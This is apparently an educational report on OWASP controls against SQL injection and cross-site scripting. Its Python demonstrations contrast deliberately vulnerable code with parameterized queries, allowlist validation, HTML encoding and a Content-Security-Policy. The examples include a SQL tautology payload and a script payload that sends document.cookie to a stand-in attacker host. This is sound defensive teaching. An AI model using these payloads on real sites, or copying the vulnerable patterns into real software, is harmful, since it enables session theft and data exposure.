
Mitigating Injection and XSS Threats

Introduction

Attackers continually refine their methods and increasingly use automation and machine learning to speed up each stage of the attack lifecycle (Higuera et al., 2020). A security professional therefore has to anticipate such threats and strengthen the organization's defenses before they are tested. The OWASP Top 10 and the companion OWASP Top 10 Proactive Controls give web application teams a prioritized list of the most common risks and of the controls that address them (Mateo et al., 2020). This is a preliminary report on the preventive measures that could have been implemented earlier in the development life cycle to mitigate the security risks identified during testing.

Risk One

One of the security risks identified during the development lifecycle is injection, which occurs when untrusted data is sent to an interpreter (for example a SQL, LDAP or operating-system command interpreter) as part of a command or query. Injection attacks compromise the confidentiality and integrity of data, since the attacker's input can read, alter or delete records (Higuera et al., 2020). In some cases they also let the attacker execute arbitrary commands on the server, and so take control of parts of the application or of the underlying system. To prevent such attacks, the OWASP Top 10 Proactive Controls recommend a combination of techniques, chiefly parameterized queries (prepared statements) together with positive input validation throughout the system (Higuera et al., 2020). Parameterized queries are the primary defense: the query text is fixed in advance and user data is passed to the database only as bound values, so the data can never change the structure of the command. Positive (allowlist) validation adds a second layer: the application checks whether each input matches a predefined set of rules, such as a permitted character set and length, and rejects anything that does not (Mateo et al., 2020). The same controls also call for validating and, where necessary, sanitizing all user-supplied data. Validation rejects suspicious input rather than cleaning it, and sanitization (removing or neutralizing dangerous content) complements parameterized queries but does not replace them.
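The following block is an added example, not code from the original report, showing the two controls described above side by side. It builds an in-memory SQLite table with constructed sample users, runs a classic tautology payload through a deliberately vulnerable string-built query, through a parameterized query, and through a lookup that applies an allowlist check before binding the parameter. The table layout, the username rule and the payload are all assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed sample rows for this demonstration (not data from the page).
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]

# Positive (allowlist) validation rule, chosen for this example: a username is
# 3 to 32 characters from a fixed alphabet. Anything else is rejected outright
# rather than "cleaned up".
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def is_valid_username(value: str) -> bool:
    """Return True only if the whole string matches the allowlist pattern."""
    return USERNAME_RE.fullmatch(value) is not None


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT NOT NULL, email TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Deliberately vulnerable: data is spliced into the command text, so a
    quote inside `name` rewrites the WHERE clause."""
    sql = f"SELECT name, email FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the SQL text is constant and `name` travels to the engine as a
    bound value, so it can never change the query's structure."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def lookup_defended(conn: sqlite3.Connection, name: str):
    """Both controls together: allowlist validation first, parameter binding
    second. Returns None when the input is rejected."""
    if not is_valid_username(name):
        return None
    return lookup_parameterized(conn, name)


# Classic tautology payload, constructed for the demonstration.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))      # every row leaks
    print("parameterized:", lookup_parameterized(db, PAYLOAD))   # no such user: []
    print("defended     :", lookup_defended(db, PAYLOAD))        # rejected: None
    print("defended     :", lookup_defended(db, "alice"))        # normal lookup
```

The vulnerable function returns all three rows because the payload turns the WHERE clause into `name = '' OR '1'='1'`. The parameterized version searches for a user literally named `' OR '1'='1` and finds none, while the defended version never reaches the database at all. Note that the allowlist rejects input; it does not try to repair it.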

Risk Two

Another risk featured in the OWASP Top 10 and identified during the security testing was cross-site scripting (XSS). XSS occurs when a web application includes untrusted data in a page without validating or encoding it, so that script supplied by an attacker is delivered to other users and runs in their browsers with their session privileges. The threat is most serious for applications that hold large amounts of sensitive data. XSS attacks mainly steal users' session tokens or credentials, and sometimes redirect users to malicious sites that phish for personal data (Mateo et al., 2020). According to the OWASP Top 10 Proactive Controls, the mitigations for cross-site scripting are to encode untrusted data (including HTTP request data) for the context in which it is output, and to validate and sanitize user-generated content before it is stored or displayed (Higuera et al., 2020). Converting user input into a form the browser treats as text rather than as executable code removes the attacker's ability to run script in the page (Higuera et al., 2020). The proactive controls likewise recommend a Content Security Policy (CSP), a response header that tells the browser which sources of scripts and other content it may load for that page, so that injected script from an unapproved source is blocked even where encoding has been missed.
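As an added example, not part of the original report, the block below renders a constructed user comment and title into an HTML fragment twice: once by plain concatenation, which leaves the attacker's script tag and attribute breakout intact, and once with context-appropriate HTML entity encoding. It then builds a nonce-based Content-Security-Policy header of the kind the paragraph describes. The fragment template, the payloads and the policy directives are assumptions chosen for the demonstration.

```python
import html
import secrets
from typing import Dict, Optional

# Constructed user-generated content for this demonstration (not from the
# page): a comment body carrying a script tag, and a title that tries to break
# out of an HTML attribute to plant an event handler.
COMMENT_PAYLOAD = (
    '<script>location="https://attacker.example/?c="+document.cookie</script>'
)
TITLE_PAYLOAD = '" onmouseover="alert(1)'


def render_unsafe(comment: str, title: str) -> str:
    """Deliberately vulnerable: untrusted values are concatenated straight into
    the page, so markup and event handlers inside them become live."""
    return f'<div title="{title}">{comment}</div>'


def render_safe(comment: str, title: str) -> str:
    """Hardened: each untrusted value is HTML-entity encoded for the context it
    lands in (attribute value and element body). html.escape(quote=True) turns
    & < > " ' into entities, so the browser shows the payload as text."""
    safe_title = html.escape(title, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return f'<div title="{safe_title}">{safe_comment}</div>'


def has_live_injection(rendered: str) -> bool:
    """Crude detector used by the demo: does a raw <script tag or an attribute
    breakout survive in the rendered fragment?"""
    return "<script" in rendered or '" onmouseover=' in rendered


def csp_header(nonce: str) -> str:
    """Content-Security-Policy value. Scripts run only if they carry this
    per-response nonce; inline handlers and scripts from unlisted origins are
    blocked. 'strict-dynamic' lets nonce-trusted scripts load their own
    dependencies, object-src 'none' removes the plugin vector, base-uri 'self'
    stops <base> hijacking of relative URLs, and frame-ancestors 'none' blocks
    framing."""
    return (
        "default-src 'self'; "
        f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none'; base-uri 'self'; frame-ancestors 'none'"
    )


def response_headers(nonce: Optional[str] = None) -> Dict[str, str]:
    """Headers for one HTML response. A fresh random nonce is generated unless
    the caller supplies one; the same nonce must be placed on every legitimate
    <script> tag in that response and never reused."""
    nonce = nonce or secrets.token_urlsafe(16)
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": csp_header(nonce),
    }


if __name__ == "__main__":
    print("unsafe:", render_unsafe(COMMENT_PAYLOAD, TITLE_PAYLOAD))
    print("safe  :", render_safe(COMMENT_PAYLOAD, TITLE_PAYLOAD))
    for name, value in response_headers().items():
        print(f"{name}: {value}")
```

Encoding is context-specific: the same value placed inside a JavaScript string, a URL or a CSS block needs a different encoder than `html.escape`, which covers only HTML body and quoted-attribute contexts. The CSP is a second, independent layer; with 'strict-dynamic' present, any host allowlist in script-src is ignored by modern browsers, so the nonce alone decides which scripts run.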

Conclusion

While technology has greatly improved the modern world, threats to personal data have grown with it, resulting in millions of dollars' worth of data being lost to unauthorized parties. OWASP, an international non-profit organization, has dedicated itself to improving web application security. Several risks were identified in the security testing of the organization, including injection and cross-site scripting. According to the OWASP Proactive Controls, injection can be prevented through positive input validation and the use of parameterized queries. Cross-site scripting, the other threat identified during the tests, can be prevented by encoding untrusted data before it is placed in a page and by deploying a Content Security Policy.

References

Higuera, J. R. B., Higuera, J. B., Montalvo, J. A. S., Villalba, J. C., & Pérez, J. J. N. (2020). Benchmarking approach to compare web applications static analysis tools detecting OWASP Top Ten security vulnerabilities. Computers, Materials & Continua, 64(3). https://doi.org/10.32604/cmc.2020.010885

Mateo Tudela, F., Bermejo Higuera, J. R., Bermejo Higuera, J., Sicilia Montalvo, J. A., & Argyros, M. I. (2020). On combining static, dynamic and interactive analysis security testing tools to improve OWASP Top Ten security vulnerability detection in web applications. Applied Sciences, 10(24), 9119. https://doi.org/10.3390/app10249119

 
